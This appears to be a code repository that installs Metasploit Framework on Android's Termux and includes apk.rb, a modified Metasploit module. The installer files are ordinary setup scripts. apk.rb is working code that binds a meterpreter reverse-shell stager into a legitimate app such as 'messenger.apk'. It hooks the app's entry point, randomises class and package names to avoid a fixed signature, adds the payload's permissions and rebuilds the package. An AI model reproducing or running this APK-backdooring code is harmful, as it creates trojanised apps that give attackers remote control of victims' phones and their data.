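├── database.yml
├── README.md
├── msfconsole
├── metasploit.sh
└── apk.rb

/database.yml:
--------------------------------------------------------------------------------
# Template for ~/metasploit-framework/config/database.yml.
#
# metasploit.sh writes this file itself with a per-install random password and
# sets the same password on the `msf` PostgreSQL role, so the literal `msf`
# below is only a placeholder: it is a well-known default and must not be used
# as-is. The server is reached on 127.0.0.1 only; keep it that way on a phone.
production:
  adapter: postgresql
  database: msf_database
  username: msf
  password: msf   # placeholder, replaced by metasploit.sh
  host: 127.0.0.1
  port: 5432
  pool: 75
  timeout: 5
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
### STEPS FOR METASPLOIT
1. Download the script into your HOME directory: `wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh`
2. Read it before running it (it installs packages, removes any previous `~/metasploit-framework`, and downloads the framework tarball), then run `chmod +x metasploit.sh && ./metasploit.sh`

Notes
- The script is served over TLS only; it is not signed. Compare what you downloaded with the repository before executing it.
- Set `MSF_TARBALL_SHA256` to the expected SHA-256 of `<version>.tar.gz` if you want the installer to verify the framework download; otherwise the tarball is trusted as served.
- The installer creates the `msf` PostgreSQL role with a random password and writes it to `~/metasploit-framework/config/database.yml` (mode 600).
- Use Metasploit only against systems you are authorised to test.
--------------------------------------------------------------------------------
/msfconsole:
--------------------------------------------------------------------------------
#!/data/data/com.termux/files/usr/bin/sh
# Dispatcher installed as $PREFIX/bin/msfconsole and symlinked as msfvenom:
# runs the same-named script from the framework checkout with the Termux ruby.
SCRIPT_NAME=$(basename "$0")
METASPLOIT_PATH="${HOME}/metasploit-framework"

case "$SCRIPT_NAME" in
  msfconsole|msfvenom)
    if [ ! -r "$METASPLOIT_PATH/$SCRIPT_NAME" ]; then
      echo "[!] $METASPLOIT_PATH/$SCRIPT_NAME not found; run metasploit.sh first." >&2
      exit 1
    fi
    exec ruby "$METASPLOIT_PATH/$SCRIPT_NAME" "$@"
    ;;
  *)
    echo "[!] Unknown Metasploit command '$SCRIPT_NAME'." >&2
    exit 1
    ;;
esac
--------------------------------------------------------------------------------
/metasploit.sh:
--------------------------------------------------------------------------------
#!/data/data/com.termux/files/usr/bin/bash
# Installs Metasploit Framework $msfvar into $HOME on Termux: packages, gems,
# a local PostgreSQL database and the msfconsole/msfvenom dispatcher.
#
# Trust model: everything is fetched over HTTPS from GitHub. The framework
# tarball is verified against $MSF_TARBALL_SHA256 only when that variable is
# set, and `bundle install` builds whatever native extensions the framework's
# Gemfile.lock pulls in. Nothing here needs root.
set -eu

msfvar=6.1.21
msfpath='/data/data/com.termux/files/home'
PREFIX="${PREFIX:-/data/data/com.termux/files/usr}"

# Remove a previous install of this framework only. The former
# `find $HOME -name "metasploit-*" -type d -exec rm -rf {} \;` also deleted
# any unrelated directory whose name started with metasploit-, anywhere under
# HOME.
rm -rf "$msfpath/metasploit-framework" "$msfpath/metasploit-framework-$msfvar"

# Two statements, not `a && b`: with set -e a failure inside an && list does
# not abort, and an unattended install must not stop at an apt prompt.
apt update
apt upgrade -y

apt install -y binutils libiconv zlib autoconf bison clang coreutils curl findutils git apr apr-util libffi libgmp libpcap postgresql readline libsqlite openssl libtool libxml2 libxslt ncurses pkg-config wget make ruby libgrpc termux-tools ncurses-utils ncurses unzip zip tar termux-elf-cleaner
# Many phones are claiming libxml2 not found error
ln -sf "$PREFIX/include/libxml2/libxml" "$PREFIX/include/"

cd "$msfpath"
# -f: fail on HTTP errors instead of saving an error page as the tarball;
# --proto/--tlsv1.2: refuse redirects to plain http or legacy TLS.
curl -fL --proto '=https' --tlsv1.2 -o "$msfvar.tar.gz" "https://github.com/rapid7/metasploit-framework/archive/refs/tags/$msfvar.tar.gz"
if [ -n "${MSF_TARBALL_SHA256:-}" ]; then
  echo "$MSF_TARBALL_SHA256  $msfvar.tar.gz" | sha256sum -c - || { echo "[!] Checksum mismatch for $msfvar.tar.gz; aborting." >&2; exit 1; }
else
  echo "[!] MSF_TARBALL_SHA256 not set: the framework tarball is not integrity-checked (TLS only)." >&2
fi

tar -xf "$msfpath/$msfvar.tar.gz"
mv "$msfpath/metasploit-framework-$msfvar" "$msfpath/metasploit-framework"
cd "$msfpath/metasploit-framework"

# Update rubygems-update
#if [ "$(gem list -i rubygems-update 2>/dev/null)" = "false" ]; then
#  gem install --no-document --verbose rubygems-update
#fi

# Update rubygems
#update_rubygems

# Install bundler
#gem install --no-document --verbose bundler:1.17.3
gem install bundler

# Installing all gems
#bundle config build.nokogiri --use-system-libraries
# nokogiri is built against Termux's libxml2/libxslt rather than its vendored
# copies, so libxml2 security fixes arrive via `apt upgrade`. Note that
# `bundle install` may still install the version pinned by Gemfile.lock.
gem install nokogiri -v 1.12.5 -- --use-system-libraries
bundle install
echo "Gems installed"

# Some fixes
sed -i "s@/etc/resolv.conf@$PREFIX/etc/resolv.conf@g" "$msfpath/metasploit-framework/lib/net/dns/resolver.rb"
find "$msfpath"/metasploit-framework -type f -executable -print0 | xargs -0 -r termux-fix-shebang
find "$PREFIX"/lib/ruby/gems -type f -iname \*.so -print0 | xargs -0 -r termux-elf-cleaner

echo "Creating database"

# Write database.yml locally instead of downloading it from the unpinned
# master branch, and use a per-install random password instead of the
# well-known msf/msf pair. The same value is set on the role below.
msf_db_pass=$(head -c 24 /dev/urandom | od -An -tx1 | tr -d ' \n')
db_yml="$msfpath/metasploit-framework/config/database.yml"
mkdir -p "$(dirname "$db_yml")"
cat > "$db_yml" <<EOF
production:
  adapter: postgresql
  database: msf_database
  username: msf
  password: $msf_db_pass
  host: 127.0.0.1
  port: 5432
  pool: 75
  timeout: 5
EOF
chmod 600 "$db_yml"

mkdir -p "$PREFIX/var/lib/postgresql"
pg_ctl -D "$PREFIX"/var/lib/postgresql stop > /dev/null 2>&1 || true

if ! pg_ctl -D "$PREFIX"/var/lib/postgresql start --silent; then
  # initdb without --auth is expected to default to `trust` for local
  # connections, in which case the password above is not actually enforced;
  # pass --auth=scram-sha-256 here if that matters on your device.
  initdb "$PREFIX"/var/lib/postgresql
  pg_ctl -D "$PREFIX"/var/lib/postgresql start --silent
fi
if [ -z "$(psql postgres -tAc "SELECT 1 FROM pg_roles WHERE rolname='msf'")" ]; then
  createuser msf
fi
# The password is hex-only, so interpolating it into the statement is safe.
psql postgres -qc "ALTER ROLE msf WITH LOGIN PASSWORD '$msf_db_pass'"
# Exact-name check; the old `psql -l | grep msf_database` matched any
# database whose name merely contained the string.
if [ -z "$(psql postgres -tAc "SELECT 1 FROM pg_database WHERE datname='msf_database'")" ]; then
  createdb -O msf msf_database
fi

rm "$msfpath/$msfvar.tar.gz"

# Install the dispatcher from this script rather than fetching an executable
# from the unpinned master branch; the content is the repository's msfconsole.
cat > "$PREFIX/bin/msfconsole" <<'EOF'
#!/data/data/com.termux/files/usr/bin/sh
# Dispatcher installed as $PREFIX/bin/msfconsole and symlinked as msfvenom:
# runs the same-named script from the framework checkout with the Termux ruby.
SCRIPT_NAME=$(basename "$0")
METASPLOIT_PATH="${HOME}/metasploit-framework"

case "$SCRIPT_NAME" in
  msfconsole|msfvenom)
    if [ ! -r "$METASPLOIT_PATH/$SCRIPT_NAME" ]; then
      echo "[!] $METASPLOIT_PATH/$SCRIPT_NAME not found; run metasploit.sh first." >&2
      exit 1
    fi
    exec ruby "$METASPLOIT_PATH/$SCRIPT_NAME" "$@"
    ;;
  *)
    echo "[!] Unknown Metasploit command '$SCRIPT_NAME'." >&2
    exit 1
    ;;
esac
EOF
chmod +x "$PREFIX/bin/msfconsole"
ln -sf "$PREFIX/bin/msfconsole" "$PREFIX/bin/msfvenom"

echo "you can directly use msfvenom or msfconsole rather than ./msfvenom or ./msfconsole."
--------------------------------------------------------------------------------
/apk.rb:
--------------------------------------------------------------------------------
# -*- coding: binary -*-
#
# Termux fork of Metasploit's Msf::Payload::Apk (lib/msf/core/payload/apk.rb).
# Operational differences from upstream:
#   * keytool/jarsigner/zipalign are not available on Termux, so the signing
#     and alignment steps are disabled: the rebuilt APK is UNSIGNED and must
#     be signed (e.g. with apksigner on another host) before Android installs it.
#   * the rebuilt APK is copied to $HOME/Tmux-Bunch-Reborn/unsign instead of
#     being returned to msfvenom.

require 'msf/core'
require 'rex/text'
require 'tmpdir'
require 'nokogiri'
require 'fileutils'
require 'optparse'
require 'open3'
require 'date'
require 'shellwords'

class Msf::Payload::Apk

  # Progress line on stderr; stdout is reserved for msfvenom's own output.
  def print_status(msg='')
    $stderr.puts "[*] #{msg}"
  end

  # Error line on stderr.
  def print_error(msg='')
    $stderr.puts "[-] #{msg}"
  end

  alias_method :print_bad, :print_error

  # Print the command-line synopsis for the -x (template APK) mode.
  def usage
    print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n"
    print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
  end

  # Run +cmd+ and return its stdout followed by its stderr, or nil when the
  # executable does not exist.
  #
  # +cmd+ is a single string: Ruby hands it to /bin/sh whenever it contains
  # shell metacharacters, so any caller-controlled path interpolated into it
  # must be escaped (see Shellwords.escape in parse_orig_cert_data).
  # Open3.capture3 drains both pipes concurrently and reaps the child; the
  # previous popen3 + stdout.read + stderr.read never waited on the child and
  # deadlocks once the child fills the stderr pipe before closing stdout.
  def run_cmd(cmd)
    stdout, stderr, _status = Open3.capture3(cmd)
    stdout + stderr
  rescue Errno::ENOENT
    nil
  end

  # Pick the class whose smali will be patched to start the payload.
  #
  # Preference: the <application android:name> class (it runs before any
  # activity); otherwise the first activity (or activity-alias target) that
  # declares the LAUNCHER category. Returns the fully qualified class name,
  # or nil when the manifest declares neither.
  def find_hook_point(amanifest)
    package = amanifest.xpath("//manifest").first['package']
    application_name = amanifest.xpath('//application').attribute("name")
    return application_name.to_s if application_name

    amanifest.xpath("//activity|//activity-alias").each do |activity|
      activityname = activity.attribute("targetActivity") || activity.attribute("name")
      categories = activity.search('category')
      # search() returns a NodeSet, never nil, so the original `unless category`
      # guard could not fire; an empty set is the real "no categories" case.
      next if categories.empty?

      categories.each do |cat|
        categoryname = cat.attribute('name').to_s
        # MAIN is an intent *action*, not a category; kept for parity with upstream.
        next unless categoryname == 'android.intent.category.LAUNCHER' || categoryname == 'android.intent.action.MAIN'
        name = activityname.to_s
        name = package + name if name.start_with?('.')   # relative to the package
        return name
      end
    end
    nil
  end

  # Parse an AndroidManifest.xml (already decoded by apktool) into a Nokogiri document.
  def parse_manifest(manifest_file)
    Nokogiri::XML(File.binread(manifest_file))
  end

  # Merge the payload's manifest into the original's: add every
  # <uses-permission> the original lacks (in random order, so the permission
  # list is not a fixed signature), then register the payload's renamed
  # receiver and service under the original <application>. Writes the result
  # back to the original manifest in +tempdir+.
  #
  # Raises RuntimeError if the payload manifest has no receiver or service.
  def fix_manifest(tempdir, package, main_service, main_broadcast_receiver)
    payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
    payload_permissions = payload_manifest.xpath("//manifest/uses-permission")

    original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
    original_permissions = original_manifest.xpath("//manifest/uses-permission")

    old_permissions = original_permissions.map { |permission| permission.attribute("name").to_s }
    add_permissions = payload_permissions.reject { |permission|
      old_permissions.include?(permission.attribute("name").to_s)
    }.map(&:to_xml)
    add_permissions.shuffle!

    application = original_manifest.xpath('//manifest/application')
    add_permissions.each do |permission_xml|
      print_status("Adding #{permission_xml}")
      if original_permissions.empty?
        # No permission block yet: insert before <application>, then re-query
        # so later permissions are inserted in front of it like the else branch.
        application.before(permission_xml)
        original_permissions = original_manifest.xpath("//manifest/uses-permission")
      else
        original_permissions.before(permission_xml)
      end
    end

    application = original_manifest.at_xpath('/manifest/application')
    receiver = payload_manifest.at_xpath('/manifest/application/receiver')
    service = payload_manifest.at_xpath('/manifest/application/service')
    raise RuntimeError, "Payload manifest is missing its receiver or service declaration" unless receiver && service

    receiver.attributes["name"].value = package + '.' + main_broadcast_receiver
    label = receiver.attributes["label"]
    label.value = main_broadcast_receiver if label
    service.attributes["name"].value = package + '.' + main_service
    application << receiver.to_xml
    application << service.to_xml

    File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
  end

  # Read the template's signing certificate with keytool and return
  # [owner DN, "YYYY/mm/dd HH:MM:SS" start date, validity in days], so a
  # replacement key can mimic it. Not called while signing is disabled (see
  # backdoor_apk) but kept working for when it is.
  #
  # Raises RuntimeError when keytool is missing or prints nothing parseable.
  def parse_orig_cert_data(orig_apkfile)
    # The path is user-supplied and goes through /bin/sh: escape it. Wrapping
    # it in single quotes, as before, breaks out on a quote in the file name.
    keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile #{Shellwords.escape(orig_apkfile)}")
    raise RuntimeError, "keytool not found. If it's not in your PATH, please add it." if keytool_output.nil?

    owner_line = keytool_output[/^Owner:.+/]
    valid_from_line = keytool_output[/^Valid from:.+/]
    unless owner_line && valid_from_line
      raise RuntimeError, "Unable to read certificate details from #{orig_apkfile} (keytool said: #{keytool_output.strip})"
    end

    orig_cert_dname = owner_line.gsub(/^.*:/, '').strip
    from_date_str = valid_from_line.gsub(/^Valid from:/, '').gsub(/until:.+/, '').strip
    to_date_str = valid_from_line.gsub(/^Valid from:.+until:/, '').strip
    from_date = DateTime.parse(from_date_str)
    to_date = DateTime.parse(to_date_str)
    validity = (to_date - from_date).to_i   # DateTime difference is Rational days

    [orig_cert_dname, from_date.strftime("%Y/%m/%d %T"), validity.to_s]
  end

  # Inject +raw_payload+ (an Android stager APK built by msfvenom) into the
  # template +apkfile+:
  #   1. decompile both with apktool,
  #   2. copy the stager's smali under a random sub-package of the template,
  #      renaming its classes,
  #   3. hook the template's entry class so its first `return-void` starts the
  #      payload service,
  #   4. merge permissions/receiver/service into the template manifest,
  #   5. rebuild with apktool and copy the result to
  #      $HOME/Tmux-Bunch-Reborn/unsign.
  #
  # The result is NOT signed or zipaligned (no keytool/jarsigner/zipalign on
  # Termux); sign it before installing. Returns an empty string, which is what
  # msfvenom then writes to its -o target; the real artefact is the copied file.
  #
  # Raises RuntimeError when the template is unreadable, apktool is missing or
  # fails, or no hookable class or method can be found.
  def backdoor_apk(apkfile, raw_payload)
    unless apkfile && File.readable?(apkfile)
      usage
      raise RuntimeError, "Invalid template: #{apkfile}"
    end

    # Upstream checks here for keytool, jarsigner, zipalign and apktool >= 2.0.1
    # and generates a keystore mimicking the template's certificate
    # (parse_orig_cert_data). Those tools are absent on Termux, so only the
    # apktool dependency is enforced below and signing is left to the user.

    # The temporary tree (and everything in it) is removed when the block exits,
    # including on error; the old `rm -rf` via run_cmd ran only on success.
    Dir.mktmpdir do |tempdir|
      # binwrite, not File#puts: puts appends a newline to the APK bytes.
      File.binwrite("#{tempdir}/payload.apk", raw_payload)
      FileUtils.cp apkfile, "#{tempdir}/original.apk"

      print_status "Decompiling original APK..\n"
      decompile = run_cmd("apktool d -f -r --force-manifest #{tempdir}/original.apk -o #{tempdir}/original")
      raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." if decompile.nil?
      print_status "Decompiling payload APK..\n"
      run_cmd("apktool d -f -r --force-manifest #{tempdir}/payload.apk -o #{tempdir}/payload")

      amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")

      print_status "Locating hook point..\n"
      hookable_class = find_hook_point(amanifest)
      raise RuntimeError, "Unable to find a hookable class (no <application android:name> or LAUNCHER activity)" unless hookable_class
      smali_glob = "#{tempdir}/original/smali*/" + hookable_class.gsub(/\./, "/") + ".smali"
      smalifile = Dir.glob(smali_glob).find { |candidate| File.readable?(candidate) }
      raise RuntimeError, "Unable to find hook point in #{smali_glob}\n" unless smalifile
      hooksmali = File.read(smalifile)

      entrypoint = 'return-void'
      unless hooksmali.include? entrypoint
        raise RuntimeError, "Unable to find hookable function in #{smalifile}\n"
      end

      # Remove unused files
      FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
      FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")

      # Random sub-package and class names so the injected code has no fixed path.
      package = amanifest.xpath("//manifest").first['package'] + ".#{Rex::Text::rand_text_alpha_lower(5)}"
      classes = {
        'Payload' => Rex::Text::rand_text_alpha_lower(5).capitalize,
        'MainService' => Rex::Text::rand_text_alpha_lower(5).capitalize,
        'MainBroadcastReceiver' => Rex::Text::rand_text_alpha_lower(5).capitalize
      }
      package_slash = package.gsub(/\./, "/")
      print_status "Adding payload as package #{package}\n"
      payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
      payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
      FileUtils.mkdir_p payload_dir

      # Copy over the payload files, fixing up the smali code
      payload_files.each do |file_name|
        smali = File.read(file_name)
        smali_class = File.basename file_name
        classes.each do |oldclass, newclass|
          smali_class = "#{newclass}.smali" if smali_class == "#{oldclass}.smali"
          smali.gsub!(/com\/metasploit\/stage\/#{oldclass}/, package_slash + "/" + newclass)
        end
        smali.gsub!(/com\/metasploit\/stage/, package_slash)
        File.open("#{payload_dir}#{smali_class}", "wb") { |file| file.puts smali }
      end

      # Start the payload service immediately before the hooked method returns.
      payloadhook = %Q^invoke-static {}, L#{package_slash}/#{classes['MainService']};->start()V

^ + entrypoint
      hookedsmali = hooksmali.sub(entrypoint, payloadhook)

      print_status "Loading #{smalifile} and injecting payload..\n"
      File.open(smalifile, "wb") { |file| file.puts hookedsmali }

      injected_apk = "#{tempdir}/output.apk"
      print_status "Poisoning the manifest with meterpreter permissions..\n"
      fix_manifest(tempdir, package, classes['MainService'], classes['MainBroadcastReceiver'])

      print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk} and yes it's me guys...your friend Lokesh (Hax4Us) thanx for using my tool TMUX-BUNCH \n"
      print_status "Note :- this apk.rb script is written by Metasploit team (almost by my friend tim) and I am just a modifier of this script for binding payload in termux"
      # Resolve $PREFIX here instead of leaving it to the shell; the default is
      # the Termux prefix used by this repository's shebangs.
      aapt = File.join(ENV.fetch('PREFIX', '/data/data/com.termux/files/usr'), 'bin', 'aapt')
      run_cmd("apktool b --aapt #{Shellwords.escape(aapt)} -o #{injected_apk} #{tempdir}/original")
      unless File.readable?(injected_apk)
        raise RuntimeError, "Unable to rebuild apk with apktool"
      end

      # Signing (jarsigner) and zipalign are intentionally skipped; see the
      # file header. FileUtils.cp raises if the destination cannot be written,
      # where the old `cp` through run_cmd silently lost the result.
      FileUtils.cp(injected_apk, File.join(Dir.home, 'Tmux-Bunch-Reborn', 'unsign'))
    end

    ''
  end
end
--------------------------------------------------------------------------------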